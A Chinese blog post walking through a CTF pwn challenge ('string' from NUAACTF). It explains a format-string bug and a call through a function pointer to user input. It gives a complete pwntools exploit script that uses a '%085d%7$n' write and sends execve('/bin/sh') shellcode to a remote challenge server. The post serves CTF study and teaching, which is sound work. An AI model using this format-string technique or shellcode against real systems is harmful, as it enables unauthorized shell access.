NUAActf string wp

最新推荐文章于 2024-06-20 01:36:54 发布
最新推荐文章于 2024-06-20 01:36:54 发布
阅读量1.1k 收藏 1
点赞数 1
分类专栏: 攻防世界pwn题wp pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43394612/article/details/86363210
版权

64位的格式化串还没做过,导致做了半天。

拿到题目检查下防护:
在这里插入图片描述
开启了canary。
简单运行看了下程序逻辑后放到IDA里:
为了方便看,部分变量名已修改:
在这里插入图片描述
在这里插入图片描述
sub_400A70这个函数里没啥问题。
在这里插入图片描述
输入east退出来。进入east函数:
里面有个格式化串的漏洞:
在这里插入图片描述
继续往下看:
在这里插入图片描述
关键在:
在这里插入图片描述
将输入的这个字符串的首地址强制转化为函数指针后调用他。
看汇编清楚点:
在这里插入图片描述
那这里就可以读入shellcode,然后再调用shellcode即可。
想要触发这个模块,需要
在这里插入图片描述
从main函数可以看到:
在这里插入图片描述
已经将地址给泄露出来了,只需要用格式化串漏洞,将其修改为85即可。
exp如下:

from pwn import *

#a=process("./string")

#gdb.attach(a,"b *0x0000000000400C72")

a=remote("111.198.29.45","30230")

a.recvuntil("secret[0] is ")

v3_addr=a.recvuntil("\n")

v3_addr="0x"+v3_addr[:-1]

v3_address=eval(v3_addr)

print (hex(v3_address))

a.recvuntil("What should your character's name be:\n")

a.sendline("a")

a.recvuntil("So, where you will go?east or up?:\n")

a.send("east\n")

a.recvuntil("go into there(1), or leave(0)?:\n")

a.send("1\n")

a.recvuntil("'Give me an address'\n")

a.send(str(v3_address)+"\n")

a.recvuntil("you wish is:\n")

payload="%085d%7$n"

a.sendline(payload)

a.recvuntil("Wizard: I will help you! USE YOU SPELL\n")

a.sendline("\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05")

a.interactive();
dittozzz
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
NUAACTF pwn string writeup
qq_39596232的博客
08-24 1570
题目描述: 菜鸡遇到了Dragon,有一位巫师可以帮助他逃离危险,但似乎需要一些要求 题目分析: 1、首先查看下文件的信息及其保护机制: tucker@ubuntu:~/pwn$ file string string: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter...
string [XCTF-PWN]CTF writeup系列7(超详细分析)
重新启程
12-20 3989
题目地址:string 先看看题目情况 照例检查一下保护机制 root@mypwn:/ctf/work/python# checksec 167e00a26ef44e1f888b3ede29d88e38 [*] '/ctf/work/python/167e00a26ef44e1f888b3ede29d88e38' Arch: amd64-64-little RE...
CTF校赛总结wp【web】
qq_57356551的博客
05-13 366
作为ctf的小白,也是借着学校组织ctf比赛的机会锻炼了一下自己,总的来说,还是有蛮多收获的,理解了一些平时没弄懂的问题,也对接下来的学习有了一个方向,话不多说,记录一下wp
PolarCTF2024冬季个人挑战赛wp含web、misc、crypto_polar冬季赛
最新发布
2401_84263282的博客
06-20 792
,3(S-#4V题目名字包含uu,推测是uuencode,得到123456,应该是某个压缩包密码尝试过各种音频隐写,都不对,赛后看讲解视频才发现是steghide,其实这个123456或许能够猜到(???得到flag.txt,再拿去uuencode解码一下。
攻防世界PWN-hello_pwn
Deeeelete的博客
11-14 402
题目:hello_pwn 进pe查看程序 因为该题目比较简单,所以确认是64位程序,直接进IDA f5反编译main函数 单独摘出代码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { alarm(0x3Cu); setbuf(stdout, 0LL); puts("~~ welcome to ctf ~~ "); puts("lets get helloworld for bof"); re
csaw-ctf warmup wp
ditto的博客
01-20 697
拿到题目检查防护: 64位程序,简单的栈溢出: 程序本身有cat flag 计算下溢出点: exp如下:
安恒月赛杯9月逆向
40KO的博客
01-29 761
NewDriver 本题主要涉及base64加密和RC4加密的知识   拿到一个PE文件,运行之后是个控制台程序,简单的要求输入flag,然后判断是否正确,无壳。 用32位IDA打开,找到main函数,由于栈帧不平衡无法反编译,可以修改堆栈指针使其平衡然后进行反编译,不过该题主函数逻辑不复杂,可以直接看汇编代码。 直接来到开始输入的指令位置 显然,var_38便是用来存储输入的变量...
C语言头文件 STRING
06-13
C语言头文件 STRINGC语言头文件 STRINGC语言头文件 STRINGC语言头文件 STRINGC语言头文件 STRINGC语言头文件 STRINGC语言头文件 STRINGC语言头文件 STRINGC语言头文件 STRINGC语言头文件 STRINGC语言头文件 STRINGC...
StringUtil.java
08-08
java编程中对字符串的各种方式的处理,包括(空字符串处理、判断是否是空字符串 null和"" 都返回 true、 把string array or list用给定的符号symbol连接成一个字符串、 判定第一个字符串是否等于的第二个字符串中的某...
String.txt
07-15
String a="abc";//创建字符串方式1 String b =new String("abc"); //创建字符串方式2 System.out.println(a==b); //false,内存地址不相等 String c =new String("abc"); String d =new String...
string xmind
04-24
string xmind
Python string.html
02-05
Python string类型,字符串转化成整数,转化成浮点数,了解常见的转义字符,什么是切片?如何使用切片截取字符串,做好小练习
[XCTF] [NJUPT CTF 2017] maze
0of_blog
05-25 229
下载附件,运行一下 丢进IDA看伪代码 __int64 __fastcall main(int a1, char **a2, char **a3) { __int64 v3; // rbx int v4; // eax char v5; // bp char v6; // al const char *v7; // rdi unsigned int v9; // [rsp+0h] [rbp-28h] BYREF int v10[9]; // [rsp+4h] [...
NUAACTFpychon
OIqng的博客
08-03 312
读题 2017NUAACTF逆向题目。flag格式nuaactf{} 审题 题目没有给出什么有用的信息 提供 解题 文件头魔数,.pyc反编译 首先看后缀,是一个.pyc文件。于是直接丢当网上反编译一下:http://tool.lu/pyc/得到下图结果 反编译失败后查看这个文件的开头格式是否正确无误,发现其格式为16 0D 01 0A pyc开头固定四个字节为: xx xx 0d 0a xx依据版本号不同而不同,这里我们使用任何一个能够看到二进制的编辑器打开,能够看到: 16 0d 01 0a
NJUPTCTF2018 Easy_Audit
stepone4ward的博客
03-05 899
1.Easy_Audit 点击进入index.php 首先是一个if判断语句,将我们以post,get和cookie方法传入的数据变成了键值对,其中的值中不能出现字母。 然后又是一个if判断语句$_SERVER会截取url?后的内容,也就是我们以get方式传入的内容中不可以出现yulige,flag,nctf。 对于上述的两个if判断语句,第一个语句中的$_REQUESTS接受以post方法,...
NUAACTF-2020 web 解题思路分享
qq_42851946的博客
06-01 4563
是阳间题 感谢喵师傅的环境,膜:https://miaotony.xyz/2020/05/30/CTF_2020NUAACTF/ web1-checkin ctrl+u的,没注意到在下面,后来在返回包的html里才看见。。。 nuaactf{we1cOme_to_NuaAcTF} web2-jwt 关于jwt和jwt伪造,膜:https://blog.csdn.net/qq_45521281/article/details/106073624 github上有一个爆破jwt-secret的工具,膜:htt
BugKu-traffic[NUAACTF-2017-MISC]
Welcome To Myon'Blog !
04-16 529
之前刷题还遇到过 GPS 流量画图,和这道题还是挺像的,除了这个工具,网上还有很多用于 USB 流量解密的脚本,我朋友用的另一个脚本就没搞出来,只能说针对不同类型使用不同方法。勇师傅原本很久没做杂项题了,我朋友开始学 CTF 遇到点问题,浅浅看一下吧~(其中 1.pcap 是题目附件,out.csv 是我运行结果的输出文件)wireshark 直接看不出什么,但是可以知道是 USB 流量。根据这些信息我们可以画出 flag,也就是鼠标运动的轨迹。载入 csv 文件,画出 flag,结果都是一样的。
NUAACTF - Web - Ez_Flask
1tachi的博客
12-27 598
按照提示随便传一个:?name=123 可能存在模板渲染,检测一下:?name=${2*7} ?name={{7*7}} ?name={{7*'7'}} 发现是 jinja2 渲染 看一下所有的类:?name={{[].__class__.__base__.__subclasses__()}} 可以一点一点的往下找,也可以直接写payload {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ ==.
nuaactf hello_pwn writeup
ditto的博客
12-22 1071
拿到题目 检查下有什么防护: 直接放到IDA里: 代码很短 数组unk_601068和变量dword_60106C都在.bss段里: sub40686()这个函数是读取flag: 这里说下read函数,第一个参数为0,代表标准输入即从终端输入,第三个参数是输入的个数是0x10,即16个字节。 想要读取flag只需变量dword_60106C的值为0x6E756161即可,那就很明显了,只需...
Java String类深入解析
"Java中String类的详细文档打印版,包含源码注释及关键方法" 在Java编程语言中,`String`类是用于表示字符序列的重要类。它位于`java.lang`包中,是所有Java程序的基础。`String`类的实例表示不可变的字符序列,这...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值